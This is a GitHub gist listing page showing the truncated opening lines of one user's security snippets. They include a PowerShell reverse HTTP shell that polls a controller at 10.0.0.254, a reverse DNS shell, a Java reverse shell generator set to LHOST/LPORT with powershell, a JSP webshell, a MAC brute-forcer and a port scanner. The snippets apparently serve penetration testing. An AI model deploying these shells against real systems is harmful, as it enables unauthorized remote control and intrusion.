Skip to content

Instantly share code, notes, and snippets.

View FrankSpierings's full-sized avatar

Frank Spierings FrankSpierings

57 followers · 1 following
View GitHub Profile
@FrankSpierings
FrankSpierings / client.ps1
Last active January 11, 2020 11:12
Poor man's Reverse DNS Shell
#
# DNS requests created: <clientid>.<type>.<msgid>.<oftotalids>.<data>.<random>.<domain>
#
Function ConvertTo-Blocks() {
param(
[String]$String,
[int]$Size
)
[Array]$output = @()
for ($i=0; $i -lt $String.Length; $i+=$Size) {
@FrankSpierings
FrankSpierings / plantable.ps1
Last active December 12, 2019 14:27
Reverse HTTP Shell Powershell/Python
$url = "http://10.0.0.254:8000";
$clientid = "1234567";
$polltime = 5;
$wc = New-Object System.Net.WebClient;
$whc = New-Object System.Net.WebHeaderCollection;
$whc.Add("X-Client-Id", $clientid)
$wc.Headers = $whc
while ($true) {
@FrankSpierings
FrankSpierings / generate-java-reverse-shell-ssl.sh
Last active March 21, 2023 03:45
Java reverse shell
#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'
CURDIR=$(pwd)
@FrankSpierings
FrankSpierings / headerchecker.py
Created November 8, 2019 09:11
#!/usr/bin/env python3
import argparse
import requests
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import logging
import logging.config
logconfig = {'version': 1,
'disable_existing_loggers': False,
'formatters': {'standard': {'format': '[%(levelname)s] %(message)s'}},
'handlers': {'default': {'level': 'DEBUG',
@FrankSpierings
FrankSpierings / netrange.py
Created October 24, 2019 07:34
Show the network range based on a IP (CIDR)
from netaddr import IPNetwork
network = IPNetwork('192.168.21.2/26')
print('Network: {0} - {1}'.format(network.network, network.broadcast))
@FrankSpierings
FrankSpierings / burp-mitm-config.json
Last active July 21, 2022 14:25
MITM SSID setup
{
"proxy":{
"request_listeners":[
{
"certificate_mode":"per_host",
"listen_mode":"all_interfaces",
"listener_port":8080,
"running":true,
"support_invisible_proxying":true
}
@FrankSpierings
FrankSpierings / port-scan.ps1
Last active August 14, 2019 12:11
Portscanning
#requires -Version 1
function Test-Port
{
Param([string]$ComputerName,$port = 5985,$timeout = 1000)
try
{
$tcpclient = New-Object -TypeName system.Net.Sockets.TcpClient
$iar = $tcpclient.BeginConnect($ComputerName,$port,$null,$null)
$wait = $iar.AsyncWaitHandle.WaitOne($timeout,$false)
@FrankSpierings
FrankSpierings / mac-bruteforce.py
Last active November 12, 2024 13:04
Brute force a mac address using Scapy and DHCP to check the response
import time
from itertools import product
import sys
from scapy.all import *
prefixes = ['001122','445566']
timeout = 10
breakcounter = 255
iface = 'eth0'
@FrankSpierings
FrankSpierings / Readme.md
Last active August 9, 2019 14:21
JSP Webshell

Create WAR

zip -r ../shell.war *

@FrankSpierings
FrankSpierings / scan2db.py
Last active August 18, 2025 12:58
Nmap, Nessus and masscan to sqlite database.
#!/usr/bin/env python3
import logging
import logging.config
import os
import sqlite3
import tempfile
import argparse
import re
from bs4 import BeautifulSoup